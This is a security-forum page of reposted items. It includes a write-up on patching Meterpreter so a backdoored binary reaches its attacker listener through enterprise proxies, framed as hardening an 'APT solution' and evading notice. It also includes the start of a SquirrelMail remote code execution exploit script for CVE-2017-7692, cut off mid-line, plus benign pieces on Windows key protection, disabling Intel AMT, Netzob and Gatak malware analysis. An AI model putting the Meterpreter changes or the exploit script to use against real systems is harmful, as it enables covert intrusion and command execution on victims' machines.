DLL code (metsrv.x86.dll or metsrv.x64.dll). The following screenshot shows the external IP of the victim machine: The following screenshot shows the proxy configuration (Automatically detect settings) of the victim machine: The following screenshot shows the use of “autoprox.exe” on the victim machine. Observe that a proxy configuration was obtained via DHCP (option 252): In the above image it can be observed that, for “www.google.com", the proxy 10.x.x.20:8080 has to be used. This can also be learnt by manually downloading and inspecting the rules contained in the wpad.dat file (its location was provided via the option 252 of DHCP). Note: according to my analysis, autoprox.exe (by pierrelc@microsoft.com) will use the Windows API to search first for the proxy settings received via DHCP and then if it fails, it will search for proxy settings that can be obtained via DNS. Analysis During the analysis of the problem, I will be changing a few lines of code of the Meterpreter payload and testing it in the victim machine, therefore it is required to create a backdoored binary with a HTTPS reverse meterpreter staged payload (windows/meterpreter/reverse_https) or use a web delivery module. Whatever you want to use, is ok. Note: a simple backdoored binary can be created with Shellter and any trusted binary such as putty.exe, otherwise, use the Metasploit web delivery payload with Powershell. Remember that we will be modifying the stage payload and not the stager, therefore you just need to create one backdoored binary for all the experiment. Let’s execute the backdoored binary on the victim machine and observe what happens in the Metasploit listener that is running on the attacker machine. The following screenshot shows that the MSF handler is running on the victim machines (PORT 443), and then a connection is established with the victim machine (SRC PORT 18904): In the above image, it can be observed that the victim machine is reaching the handler and we are supposedly getting a Meterpreter shell. However, it was impossible to get a valid answer for any command I introduced and then the session is closed. From a high level perspective, when the stager payload (a small piece of code) is executed on the victim machine, it connects back to the listener to download a bigger piece of code (the stage Meterpreter payload), injects it in memory and give the control to it. The loaded Meterpreter payload will connect again with the listener allowing the interaction with the affected system. From what we can see so far, the stager was successfully executed and was able to reach the listener through the proxy. However, when the stage payload was injected (if it worked), something is going wrong and it dies. Note: in case you are wondering, the AV was verified and no detection was observed. Also, in case the network administrator decided to spy the HTTPs content, I manually created a PEM certificate, configured the listener to make use of it and then compared the fingerprint of the just created certificate against the fingerprint observed with the browser when the Metasploit listener was visited manually to make sure the certificate was not being replaced in transit. This motivated me to continue looking for the problem in other place. The next, perhaps obvious, step would be to sniff the traffic from the victim machine to understand more about what is happening (from a blackbox perspective). The following screenshot shows the traffic captured with Wireshark on the victim machine: In the above image it can be observed a TCP connection between the victim machine (10.x.x.189) and the the proxy server (10.x.x.20:8080), where a CONNECT method is sent (first packet) from the victim asking for a secure communication (SSL/TLS) with the attacker machine (190.x.x.x:443). In addition, observe the NTLM authentication used in the request (NTLMSSP_AUTH) and the response from the proxy server is a “Connection established” (HTTP/1.1 200). After that, an SSL/TLS handshake took place. It worth mentioning that the above image shows the traffic sent and received during the first part, that is, when the stager payload was executed. After the connection is established, a classic SSL/TLS handshake is performed between the two ends (the client and the server), and then, within the encrypted channel, the stage payload will be transferred from the attacker machine to the victim. Now that we confirmed that the first part (staging) of the Meterpreter “deployment” was working, what follows is to understand what is happening with the second part, that is, the communication between the stage payload and the listener. In order to do that, we just need to continue analyzing the traffic captured with Wireshark. The following screenshot shows what would be the last part of the communication between the stager payload and the listener, and then an attempt of reaching the attacker machine directly from the victim (without using the proxy): In the first 5 packets of the above image, we can see the TCP connection termination phase (FIN,ACK; ACK; FIN,ACK; ACK) between the victim machine (10.x.x.189) and the proxy server (10.x.x.20). Then, it can be observed that the 6th packet contains a TCP SYN flag (to initiate a TCP handshake) sent from the victim machine to the attacker machine directly, that is, without using the proxy server as intermediary. Finally, observe the 7th packet received by the victim machine from the gateway indicating the destination (attacker machine) is not directly reachable from this network (remember I told you that it was required to use a proxy server to reach Internet). So, after observing this traffic capture and seeing that the Meterpreter session died, we can think that the Meterpreter stage payload was unable to reach the listener because, for some reason, it tried to reach it directly, that is, without using the system proxy server in the same way the stager did. What we are going to do now is to download Meterpreter source code, and try to understand what could be the root cause of this behavior. To do this, we should follow the “Building — Windows” guide published in the Rapid7 github (go to references for a link). Now, as suggested by the guide, we can use Visual Studio 2013 to open the project solution file (\metasploit-payloads\c\meterpreter\workspace\meterpreter.sln) and start exploring the source code. After exploring the code, we can observe that within the “server_transport_winhttp.c” source code file there is a proxy settings logic implemented (please, go to the references to locate the source file quickly). The following screenshot shows part of the code where the proxy setting is evaluated by Meterpreter: As I learnt from the Meterpreter reverse_https related threads in github, it will try to use (firstly) the WinHTTP Windows API for getting access to the Internet and in this portion of code, we are seeing exactly that. As we can see in the code it has plenty of dprintf call sentences that are used for debugging purposes, and that would provide valuable information during our runtime analysis. In order to make the debugging information available for us, it is required to modify the DEBUGTRACE pre-processor constant in the common.h source code header file that will make the server (Meterpreter DLL loaded in the victim) to produce debug output that can be read using Visual Studio’s _Output_ window, DebugView from SysInternals, or _Windbg_. The following screenshot shows the original DEBUGTRACE constant commented out in the common.h source code file: The following screenshot shows the required modification to the source code to obtain debugging information: Now, it is time to build the solution and copy the resulting “metsrv.x86.dll” binary file saved at “\metasploit-payloads\c\meterpreter\output\x86\” to the attacker machine (where the metasploit listener is), to the corresponding path (in my case, it is /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/metasploit-payloads-1.1.26/data/meterpreter/). On the debugging machine, let’s run the “DebugView” program and then execute the backdoored binary again to have the Meterpreter stager running on it. The following screenshot shows the debugging output produced on the victim machine: From the debugging information (logs) generated by Meterpreter, it can be observed that the lines 70 through 74 corresponds to the lines 48 through 52 of the server_transport_winhttp.c source code file, where the dprintf sentences are. In particular, the line 71 (“[PROXY] AutoDetect: yes”) indicates that the proxy “AutoDetect” setting was found in the victim machine. However, the proxy URL obtained was NULL. Finally, after that, it can be observed that the stage tried to send a GET request (on line 75). Thanks to the debugging output generated by Meterpreter, we are now closer to the problem root. It looks like the piece of code that handles the Windows proxy setting is not properly implemented. In order to solve the problem, we have to analyze the code, modify it and test it. As building the Meterpreter C solution multiple times, copying the resulting metsrv DLL to the attacker machine and testing it with the victim is too much time consuming I thought it would be easier and painless to replicate the proxy handling piece of code in Python (ctypes to the rescue) and modify it multiple times in the victim machine. The following is, more or less, the Meterpreter proxy piece of code that can be found in the analyzed version of the server_transport_winhttp.c source code file, but written in Python: The following screenshot shows the execution of the script on the victim machine: The output of the script shows the same information that was obtained in the debugging logs. The proxy auto configuration setting was detected, but no proxy address was obtained. If you check the code again you will realize that the DHCP and DNS possibilities are within the “if” block that evaluates the autoconfiguration URL (ieConfig.lpszAutoConfigUrl). However, this block would not be executed if only the AutoDetect option is enable, and that is exactly what is happening on this particular victim machine. In this particular scenario (with this victim machine), the proxy configuration is being obtained via DHCP through the option 252. The following screenshot shows DHCP transaction packets sniffed on the victim machine: Observe from the DHCP transaction sniffed on the victim machine that the DHCP answer, from the server, contains the option 252 (Private/Proxy autodiscovery) with the proxy URL that should be used to obtain information about the proxy. Remember that this is what we obtained before using the autoprox.exe tool. Before continuing, it is important to understand the three alternatives that Windows provides for proxy configuration: Automatically detect settings: use the URL obtained via DHCP (options 252) or request the WPAD hostname via DNS, LLMNR or NBNS (if enabled). Use automatic configuration script: download the configuration script from the specified URL and use it for determining when to use proxy servers. Proxy server: manually configured proxy server for different protocols. So, now that we have more precise information about the problem root cause, I will slightly modify the code to specifically consider the Auto Detect possibility. Let’s first do it in Python, and if it works then update the Meterpreter C code and build the Meterpreter payload. The following is the modified Python code: In the modified code it can be observed that it now considers the possibility of a proxy configured via DHCP/DNS. Let’s now run it and see how it behaves. The following screenshot shows the output of the modified Python code run on the victim machine: Observe that it successfully detected the proxy configuration that was obtained via DHCP and it shows the exact same proxy we observed at the beginning of this article (10.x.x.20). Now that we know that this code works, let’s update the Meterpreter C source code (server_transport_winhttp.c) to test it with our backdoored binary. The following extract of code shows the updated piece on the Meterpreter source code: In the dark grey zone, it can be observed the updated portion. After modifying it, build the solution again, copy the resulting metsrv Meterpreter DLL to the listener machine and run the listener again to wait for the client. The following screenshot shows the listener running on the attacker machine: Observe how it was possible to successfully obtain a Meterpreter session when the victim machine uses the proxy “Auto Detect” configuration (DHCP option 252 in this case). Problem root cause Now, it is time to discuss something you may have wondered when reading this article: Why did the stager was able to reach the attacker machine in first place? What is the difference between the stager payload and the stage one in terms of communications? In order to find the answer for those questions, we first need to understand how Meterpreter works at the moment of this writing. Let’s start by the beginning: the Windows API provides two mechanisms or interfaces to communicate via HTTP(s): WinInet and WinHTTP. In the context of Meterpreter, there are two features that are interesting for us when dealing with HTTPs communication layer: The ability to validate the certificate signature presented by the HTTPs server (Metasploit listener running on the attacker machine) to prevent the content inspection by agents such as L7 network firewalls. In other words, we desire to perform certificate pinning. The ability to transparently use the current’s user proxy configuration to be able to reach the listener through Internet. It turns out to be that both features cannot be found in the same Windows API, that is: WinInet: Is transparently proxy aware, which means that if the current user system proxy configuration is working for Internet Explorer, then it works for WinInet powered applications. Does not provide mechanisms to perform a custom validation of a SSL/TLS certificate. WinHTTP: Allows to trivially implement a custom verification of the SSL certificate presented by a server. Does not use the current user system proxy configuration transparently. Now, in terms of Meterpreter, we have two different stagers payloads that can be used: The reverse_https Meterpreter payload uses WinInet Windows API, which means it cannot perform a certificate validation, but will use the proxy system transparently. That is, if the user can access Internet via IE, then the stager can also do it. The reverse_winhttps Meterpreter payload uses WinHTTP Windows API, which means it can perform a certificate validation, but the system proxy will have to be “used” manually. In the case of the Meterpreter payload itself (the stage payload), it uses WinHTTP Windows API by default and will fallback to WinInet in case of error (see the documentation to understand a particular error condition with old proxy implementations), except if the user decided to use “paranoid mode”, because WinInet would not be able to validate the certificate, and this is considered a priority. Note: in the Meterpreter context, “paranoid mode” means that the SSL/TLS certificate signature HAS to be verified and if it was replaced on wire (e.g. a Palo Alto Network firewall being inspecting the content), then the stage should not be downloaded and therefore the session should not be initiated. If the user requires the use of “paranoid mode” for a particular escenario, then the stager will have to use WinHTTP. Now we have enough background to understand why we faced this problem. I was using the “reverse_https” Meterpreter payload (without caring about “paranoid mode” for testing purposes), which means that the stager used the WinInet API to reach the listener, that is, it was transparently using the current user proxy configuration that was properly working. However, as the Meterpreter stage payload uses, by default, the WinHTTP API and it has, according to my criteria, a bug, then it was not able to reach back the listener on the attacker machine. I think this provides an answer to both questions. Proxy identification approach Another question that we didn’t answer is: what would be the best approach to obtain the current user proxy configuration when using the WinHTTP Windows API? In order to provide an answer for that we need to find out what is the precedence when you have more than one proxy configured on the system and what does Windows do when one option is not working (does it try with another option?). According to what I found, the proxy settings in the Internet Option configuration dialog box are presented in the order of their precedence. First, the “Automatically detect settings” option is checked, next the “Use automatic configuration script” option is checked and finally the “Use a proxy for your LAN…” is checked. In addition, a sample code for using the WinHTTP API can be found in the “Developer code sample” of Microsoft MSDN that states: // Begin processing the proxy settings in the following order: // 1) Auto-Detect if configured. // 2) Auto-Config URL if configured. // 3) Static Proxy Settings if configured This suggests the same order of precedence we already mentioned. Fault tolerant implementation A last question that I have is what happens if a host is configured with multiple proxy options and one of them, with precedence, is not working? Does Windows will continue with the next option until it finds one that works? In order to provide an answer, we could perform a little experiment or expend hours and hours reversing the Windows components that involve this (mainly wininet.dll), so let’s start by doing the experiment that will, for sure, be less time consuming. Lab settings In order to further analyze the Windows proxy settings and capabilities, I created a lab environment with the following features: A Windows domain with one Domain Controller Domain: lab.bransh.com DC IP: 192.168.0.1 DHCP service (192.168.0.100–150) Three Microsoft Forefront TMG (Thread Management Gateway) tmg1.lab.bransh.com: 192.168.0.10 tmg2.lab.bransh.com: 192.168.0.11 tmg3.lab.bransh.com: 192.168.0.12 Every TMG server has two network interfaces: the “internal” interface (range 192.168.0.x) is connected to the domain and allows clients to reach Internet through it. The “external” interface is connected to a different network and is used by the Proxy to get direct Internet access. A Windows client (Windows 8.1 x64) IP via DHCP Proxy configuration: Via DHCP (option 252): tmg1.lab.bransh.com Via script: http://tmg2.lab.bransh.com/wpad.dat Manual: tmg3.lab.bransh.com:8080 The client cannot directly reach Internet Firefox browser is configured to use the system proxy The following screenshot shows the proxy settings configured in the Windows client host The following screenshot shows the proxy set via DHCP using the option 252: Note: the “Automatically detect settings” option can find the proxy settings either via DHCP or via DNS. When using the Windows API, it is possible to specify which one is desired or both. By means of a simple code that uses the API provided by Windows, it is possible to test a few proxy scenarios. Again, I write the code in Python, as it is very easy to modify and run the code without the need of compiling a C/C++ code in the testing machine every time a modification is needed. However you can do it in the language you prefer: The code above has two important functions: GetProxyInfoList(pProxyConfig, target_url): This function evaluates the proxy configuration for the current user, and returns a list of proxy network sockets (IP:PORT) that could be used for the specified URL. It is important to remark that the proxy list contains proxy addresses that could potentially be used to access the Url. However, it does not mean that the proxy servers are actually working. For example, the list could contain the proxy read from a WPAD.DAT file that was specified via the “Use automatic configuration script” option, but the proxy may not be available when trying to access the target URL. CheckProxyStatus(proxy, target_server, target_port): This function will test a proxy against a target server and port (using the root resource URI: /) to verify if the proxy is actually providing access to the resource. This function will help to decide if a proxy, when more than one is available, can be used or not. Testing scenario #1 In this scenario, the internal network interfaces (192.168.0.x) of the proxy servers tmg1 and tmg2 are disabled after the client machine started. This means that the only option for the client machines to access Internet would be through the proxy server TMG3. The following screenshot shows the output of the script. In addition, it shows how IE and Firefox deals with the situation: The testing script shows the following: The option “Automatically detect settings” is enabled and the obtained proxy is “192.168.0.10:8080” (Windows downloaded the WPAD.PAC file in background and cached the obtained configuration before the proxy internal interface was disabled). However, the proxy is not working. As the internal interface of TMG1 was disabled, it was not possible to actually reach it through the network (a timeout was obtained). The option “Use automatic configuration script” is enabled and the obtained proxy is “192.168.0.11:8080” (Windows downloaded the WPAD.PAC file in background and cached the obtained configuration before the proxy internal interface was disabled). However, the proxy is not working. As the internal interface of TMG2 was disabled, it was not possible to actually reach it through the network (a timeout was obtained). The manually configured proxy server is “tmg3.lab.bransh.com:8080”. This proxy was successfully used and it was possible to send a request through it. Observe that neither IE nor Firefox were able to reach Internet with the presented configuration. However, a custom application that uses tmg3 as a proxy server would be able to successfully do it. Testing scenario #2 In this scenario, very similar to the #1, the internal network interfaces (192.168.0.x) of the proxy servers tmg1 and tmg2 are disabled before the client machine started. This means that the only option for the client machines to access Internet would be through the proxy server TMG3. The following screenshot shows the output of the script. In addition, it shows how IE and Firefox deals with the situation: When running our testing code, we can observe the following: The option “Automatically detect settings” is enabled (tmg1.lab.bransh.com/wpad.dat), but no proxy was obtained. This occurred because the proxy server (tmg1) was not reachable when the host received the DHCP configuration (and the option 252 in particular), therefore it was not able to download the wpad.dat proxy configuration file. The option “Use automatic configuration script” is enabled and the provided URL for the configuration file is “tmg2.lab.bransh.com/wpad.dat”. However, it was not possible to download the configuration script because the server is not reachable. The manually configured proxy server is “tmg3.lab.bransh.com:8080”. This proxy was successfully used and it was possible to send a request through it. Observe that IE was able to understand the configuration and reach Internet. However Firefox was not. Testing scenario #3 In this scenario, the internal network interface (192.168.0.11) of the proxy server TMG2 was disabled before the client machine started. This means that client machines can access Internet through proxy servers TMG1 and TMG3. The following screenshot shows the output of the script. In addition, it shows how IE and Firefox deals with the situation: When running our testing code, we can observe the following: The option “Automatically detect settings” is enabled and it is possible to access Internet through the proxy obtained (192.168.0.10:8080). The option “Use automatic configuration script” is enabled and the provided URL for the configuration file is “tmg2.lab.bransh.com/wpad.dat”. However, as the network interface of this proxy was disabled, it was not possible to download the configuration script. The manually configured proxy server is “tmg3.lab.bransh.com:8080”. This proxy was successfully used and it was possible to send a request through it. In addition, observe that IE was able to understand the configuration and reach Internet. However Firefox was not. Testing scenario #4 In this scenario, only the internal network interface (192.168.0.11) of the proxy server TMG2 is enabled: When running our testing code, we can observe the following: The option “Automatically detect settings” is enabled and it is not possible to access Internet through the proxy (192.168.0.10:8080). The option “Use automatic configuration script” is enabled and the provided URL for the configuration file is “tmg2.lab.bransh.com/wpad.dat”. In addition, the obtained proxy is 192.168.0.11:8080 and it is possible to reach Internet using it. The manually configured proxy server is “tmg3.lab.bransh.com:8080”. This proxy is not reachable and a TIMEOUT is obtained. In addition, observe that IE was not able to understand the configuration and reach Internet. However Firefox successfully used the configuration and got access to Internet. Testing scenario #5 In this scenario, the internal network interfaces of all three proxy servers are enabled. However, the external interface of the servers TMG1 and TMG2 were disabled: When running our testing code, we can observe the following: The option “Automatically detect settings” is enabled, the specificed proxy (192.168.0.10:8080) is reachable. However it answers with an error (status code 502) indicating that it is not possible to reach Internet through it. The option “Use automatic configuration script” is also enabled, the specificed proxy (192.168.0.11:8080) is reachable. However it answers with an error (status code 502) indicating that it is not possible to reach Internet through it. The manually configured proxy server is “tmg3.lab.bransh.com:8080”. This proxy is reachable and it does provide access to Internet. Observe that neither IE nor Firefox were able to access Internet. However, a custom application that uses TMG3 as a proxy server would be able to successfully do it. Conclusion In certain scenarios, like the one exposed in the first part of this post, we will find that our favorite tool does not behaves as expected. In those situations we have mainly two options: try to find another solution or get our hands dirty and make it work. For the particular enterprise escenario I described, the fix applied to Meterpreter worked properly and after compiling its Dll, it was possible to make it work using the proxy configuration described. I’m not sure if this fix will be applied to the Meterpreter code, but if you find yourself with something like this, now you know what to do. On the other hand, we saw that Windows tries to use the proxy configuration in order (according to the precedence we already talked). However, it seems that once a proxy was obtained (e.g. scenario #1), if it does not work, Windows does not try to use another available option. Also, we saw that Internet Explorer and Firefox, when configured as “Use system proxy settings”, do not behave in the same way when looking for a Proxy. Finally, we also saw that in both cases, when a proxy is reachable but it does not provide Internet access for any reason (e.g. the Internet link died), they will not try to use a different one that may work. Considering the results, we can see that we do have the necessary API functions to evaluate all the proxy configurations and even test them to see if they actually allow to access an Internet resource. Therefore, with a few more lines of code we could make our APT solution more robust so that it works even under this kind of scenarios. However, I have to admit that this are very uncommon scenarios, where a client workstation has more than one proxy configured, and I don’t really think why an administrator could end up with this kind of mess. On the other hand, I’m not completely sure if it would be a good idea to make our APT work even if IE is not working. What if a host is believed to be disconnected from the Internet, but suddenly it starts showing Internet activity by cleverly using the available proxies. This may be strange for a blue team, perhaps. As a final conclusion, I would say that making our APT solution as robust as IE is would be enough to make it work in most cases. If IE is able to reach Internet, then the APT will be as well. References Auto Proxy:https://blogs.msdn.microsoft.com/askie/2014/02/07/optimizing-performance-with-automatic-proxyconfiguration-scripts-pac/ Windows Web Proxy Configuration: https://blogs.msdn.microsoft.com/ieinternals/2013/10/11/understanding-web-proxy-configuration/ Meterpreter building: https://github.com/rapid7/metasploit-payloads/tree/master/c/meterpreter Meterpreter WinHTTP source code: https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/server/win/server_transport_winhttp.c Meterpreter common.h source code: https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/common/common.h Sysinternals DebugView: https://technet.microsoft.com/en-us/sysinternals/debugview.aspx WinHTTP vs WinInet: https://github.com/rapid7/metasploit-framework/wiki/The-ins-and-outs-of-HTTP-and-HTTPS-communications-in-Meterpreter-and-Metasploit-Stagers Metasploit bug report: https://github.com/rapid7/metasploit-payloads/issues/151 WinHTTP Sample Code: http://code.msdn.microsoft.com/windowsdesktop/WinHTTP-proxy-sample-eea13d0c Sursa: https://medium.com/@br4nsh/a-meterpreter-and-windows-proxy-case-4af2b866f4a1
    1 point
  10. How to keep a secret in Windows Protecting cryptographic keys is always a balancing act. For the keys to be useful they need to be readily accessible, recoverable and their use needs to be sufficiently performant so their use does not slow your application down. On the other hand, the more accessible and recoverable they are the less secure the keys are. In Windows, we tried to build a number of systems to help with these problems, the most basic was the Window Data Protection API (DPAPI). It was our answer to the question: “What secret do I use to encrypt a secret”. It can be thought of as a policy or DRM system since as a practical matter it is largely a speed bump for privileged users who want access to the data it protects. Over the years there have been many tools that leverage the user’s permissions to decrypt DPAPI protected data, one of the most recent was DPAPIPick. Even though I have framed this problem in the context of Windows, Here is a neat paper on this broad problem called “Playing hide and seek with stored keys”. The next level of key protection offered by Windows is a policy mechanism called “non-exportable keys” this is primarily a consumer of DPAPI. Basically, when you generate the key you ask Windows to deny its export, as a result the key gets a flag set on it that can not, via the API, be changed. The key and this flag are then protected with DPAPI. Even though this is just a policy enforced with a DRM-like system it does serve its purpose, reducing the casual copying of keys. Again over the years, there have been numerous tools that have leveraged the user’s permissions to access these keys, one of the more recent I remember was called Jailbreak (https://github.com/iSECPartners/jailbreak-Windows). There have also been a lot of wonderful walkthroughs of how these systems work, for example, this nice NCC Group presentation. The problem with all of the above mechanisms is that they are largely designed to protect keys from their rightful user. In other words, even when these systems work they key usually ends up being loaded into memory in the clear where it is accessible to the user and their applications. This is important to understand since the large majority of applications that use cryptography in Windows do so in the context of the user. A better solution to protecting keys from the user is putting them behind protocol specific APIs that “remote” the operation to a process in another user space. We would call this process isolation and the best example of this in Windows is SCHANNEL. SCHANNEL is the TLS implementation in Windows, prior to Windows 2003 the keys used by SCHANNEL were loaded into the memory of the application calling it. In 2003 we moved the cryptographic operations into Local Security Authority Subsystem Service (LSAS) which is essentially RING 0 in Windows. By moving the keys to this process we help protect, but don’t prevent, them from user mode processes but still enable applications to do TLS sessions. This comes at an expense, you now need to marshal data to and from user mode and LSAS which hurts performance. [Nasko, a former SCHANNEL developer tells me he believes it was the syncronous nature of SSPI that hurt the perf the most, this is likely, but the net result is the same] In fact, this change was cited as one of the major reasons IIS was so much slower than Apache for “real workloads” in Windows Server 2003. It is worth noting those of us involved in the decision to make this change surely felt vindicated when Heartbleed occurred. This solution is not perfect either, again if you are in Ring 0 you can still access the cryptographic keys. When you want to address this risk you would then remote the cryptographic operation to a dedicated system managed by a set of users that do not include the user. This could be TCP/IP remoted cryptographic service (like Microsoft KeyVault, or Google Cloud Key Manager) or maybe a Hardware Security Module (HSM) or smart card. This has all of the performance problems of basic process isolation but worse because the transition from the user mode to the protected service is even “further” or “bandwidth” constrained (smart cards often run at 115k BPS or slower). In Windows, for TLS, this is accomplished through providers to CNG, CryptoAPI CSPs, and Smartcard minidrivers. These solutions are usually closed source and some of the security issues I have seen in them over the years are appalling but despite their failings, there is a lot of value in getting keys out of the user space and this is the most effective way of doing that. These devices also provide, to varying degrees, protection from physical, timing and other more advanced attacks. Well, that is my summary of the core key protection schemes available in Windows. Most operating systems have similar mechanisms, Windows just has superior documentation and has answers to each of these problems in “one logical place” vs from many different libraries from different authors. Ryan Sursa: https://unmitigatedrisk.com/?p=586
    1 point
  11. Disable Intel AMT Tool to disable Intel AMT on Windows. Runs on both x86 and x64 Windows operating systems. Download: DisableAMT.exe DisableAMT.zip What? On 02 May 2017, Embedi discovered "an escalation of privilege vulnerability in Intel® Active Management Technology (AMT), Intel® Standard Manageability (ISM), and Intel® Small Business Technology versions firmware versions 6.x, 7.x, 8.x 9.x, 10.x, 11.0, 11.5, and 11.6 that can allow an unprivileged attacker to gain control of the manageability features provided by these products". Read also: Intel Active Management Technology, Intel Small Business Technology, and Intel Standard Manageability Escalation of Privilege Assigned CVE: CVE-2017-5689 Wait, what? Your machine may be vulnerable to hackers. How do I know if I'm affected? If you see any of these stickers or badges on your laptop, notebook or desktop, you are likely affected by this: You may want to read: How To Find Intel® vPro™ Technology Based PCs Usage Simple. Download and run DisableAMT.exe, and it will do the work for you. This is based on the instructions provided by the INTEL-SA-00075 Mitigation Guide When executing the tool, it will run quickly and when done, will present you with the following screen: Type Y or N if you would also like to automatically disable (by renaming) the actual LMS.exe (Intel Local Management Service) binary. When finished, a logfile will open up. Reboot your machine at this point. That's all! Details about the tool The tool is simply written in batch, and has the necessary components inside to unconfigure AMT. The batch file was compiled to an executable using the free version of Quick Batch File Compiler, and subsequently packed with UPX to reduce filesize. Additionally, ACUConfig.exe and ACU.dll from Intel's Setup and Configuration Software package is included. You may find all these files in the 'src' folder. Please find hashes below: Filename MD5 SHA1 SHA256 DisableAMT.exe 3a7f3c23ea25279084f0245dfa7ecb21 383fc99f149c4aec3536ed5370dc4b07f7f93028 f0cecef7f5d1b8be8feeddf83c71892bf9dd6e28b325f88e0c071c6be34b8c19 DisableAMT.zip 0458d8e23a527e74b567d7fa4b342fec f7b73115bfbacaea32da833deaf7c1187d1bfc40 143ffd107c3861a95e829d26baeb30316ded89bb494e74467bcfb8219f895c3b DisableAMT.bat c00bc5a37cb7a66f53aec5e502116a5c 51ca8a7c3f5a81a31115618af4245df13aa39a90 a58c56c61ba7eae6d0db27b2bc02e05444befca885b12d84948427fff544378a ACUConfig.exe 4117b39f1e6b599f758d59f34dc7642c 7595bc7a97e7ddab65f210775e465aa6a87df4fd 475e242953ab8e667aa607a4a7966433f111f8adbb3f88d8b21052b4c38088f7 ACU.dll a98f9acb2059eff917b13aa7c1158150 d869310f28fce485da0c099f7df349c82a005f30 c569d9ce5024bb5b430bab696f2d276cfdc068018a84703b48e6d74a13dadfd7 Is there an easier way to do this? Probably. Link: https://github.com/bartblaze/Disable-Intel-AMT
    1 point
  12. Netzob : Protocol Reverse Engineering, Modeling and Fuzzing About Welcome to the official repository of Netzob. Netzob is a tool that can be use to reverse engineer, model and fuzz communication protocols. It is made of two components: netzob a python project that exposes all the features of netzob (except GUI) you can import in your own tool or use in CLI, netzob_web a graphical interface that leverages web technologies. Source codes, documentations and resources are available for each component, please visit their dedicated directories. General Information Email: contact@netzob.org Mailing list: Two lists are available, use the SYMPA web interface to register. IRC: You can hang-out with us on Freenode's IRC channel #netzob @ freenode.org. Twitter: Follow Netzob's official accounts (@Netzob) Authors, Contributors and Sponsors See the top distribution file AUTHORS.txt in each component for the detailed and updated list of their authors, contributors and sponsors. Extra Zoby, the official mascot of Netzob. Link: https://github.com/netzob/netzob
    1 point
  13. Publicat pe 3 mai 2017 We take a look into the malware Gatak which uses WriteProcessMemory and CreateRemoteThread to inject code into rundll32.exe. Many thanks to @_jsoo_ for providing the sample! Follow me on Twitter: https://twitter.com/struppigel Gatak VirusBtn article: https://www.virusbulletin.com/virusbu... Sample: https://www.hybrid-analysis.com/sampl... API Monitor: http://www.rohitab.com/apimonitor Process Explorer: https://technet.microsoft.com/en-us/s... x64dbg: http://x64dbg.com/ HxD: https://mh-nexus.de/en/hxd/
    1 point
  14. #!/bin/bash # int='\033[94m __ __ __ __ __ / / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________ / / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/ / /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ ) /_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/ /____/ SquirrelMail <= 1.4.22 Remote Code Execution PoC Exploit (CVE-2017-7692) SquirrelMail_RCE_exploit.sh (ver. 1.0) Discovered and coded by Dawid Golunski (@dawid_golunski) https://legalhackers.com ExploitBox project: https://ExploitBox.io \033[0m' # Quick and messy PoC for SquirrelMail webmail application. # It contains payloads for 2 vectors: # * File Write # * RCE # It requires user credentials and that SquirrelMail uses # Sendmail method as email delivery transport # # # Full advisory URL: # https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html # Exploit URL: # https://legalhackers.com/exploits/CVE-2017-7692/SquirrelMail_RCE_exploit.sh # # Tested on: # Ubuntu 16.04 # squirrelmail package version: # 2:1.4.23~svn20120406-2ubuntu1.16.04.1 # # Disclaimer: # For testing purposes only # # # ----------------------------------------------------------------- # # Interested in vulns/exploitation? # Stay tuned for my new project - ExploitBox # # .;lc' # .,cdkkOOOko;. # .,lxxkkkkOOOO000Ol' # .':oxxxxxkkkkOOOO0000KK0x:' # .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;. # ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl. # '';ldxxxxxdc,. ,oOXXXNNNXd;,. # .ddc;,,:c;. ,c: .cxxc:;:ox: # .dxxxxo, ., ,kMMM0:. ., .lxxxxx: # .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx: # .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx: # .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx: # .dxxxxxc lddOMMMMWd0MMMMKddd. .xxxxxx: # .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx: # .dxxxxxc lKo;dNMN.oMM0;:Ok. 'xxxxxx: # .dxxxxxc ;Mc .lx.:o, Kl 'xxxxxx: # .dxxxxxdl;. ., .. .;cdxxxxxx: # .dxxxxxxxxxdc,. 'cdkkxxxxxxxx: # .':oxxxxxxxxxdl;. .;lxkkkkkxxxxdc,. # .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:. # .':oxxxxxxxxx.ckkkkkkkkxl,. # .,cdxxxxx.ckkkkkxc. # .':odx.ckxl,. # .,.'. # # https://ExploitBox.io # # https://twitter.com/Exploit_Box # # ----------------------------------------------------------------- sqspool="/var/spool/squirrelmail/attach/" echo -e "$int" #echo -e "\033[94m \nSquirrelMail - Remote Code Execution PoC Exploit (CVE-2017-7692) \n" #echo -e "SquirrelMail_RCE_exploit.sh (ver. 1.0)\n" #echo -e "Discovered and coded by: \n\nDawid Golunski \nhttps://legalhackers.com \033[0m\n\n" # Base URL if [ $# -ne 1 ]; then echo -e "Usage: \n$0 SquirrelMail_URL" echo -e "Example: \n$0 http://target/squirrelmail/ \n" exit 2 fi URL="$1" # Log in echo -e "\n[*] Enter SquirrelMail user credentials" read -p "user: " squser read -sp "pass: " sqpass echo -e "\n\n[*] Logging in to SquirrelMail at $URL" curl -s -D /tmp/sqdata -d"login_username=$squser&secretkey=$sqpass&js_autodetect_results=1&just_logged_in=1" $URL/src/redirect.php | grep -q incorrect if [ $? -eq 0 ]; then echo "Invalid creds" exit 2 fi sessid="`cat /tmp/sqdata | grep SQMSESS | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`" keyid="`cat /tmp/sqdata | grep key | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`" # Prepare Sendmail cnf # # * The config will launch php via the following stanza: # # Mlocal, P=/usr/bin/php, F=lsDFMAw5:/|@qPn9S, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL, # T=DNS/RFC822/X-Unix, # A=php -- $u $h ${client_addr} # wget -q 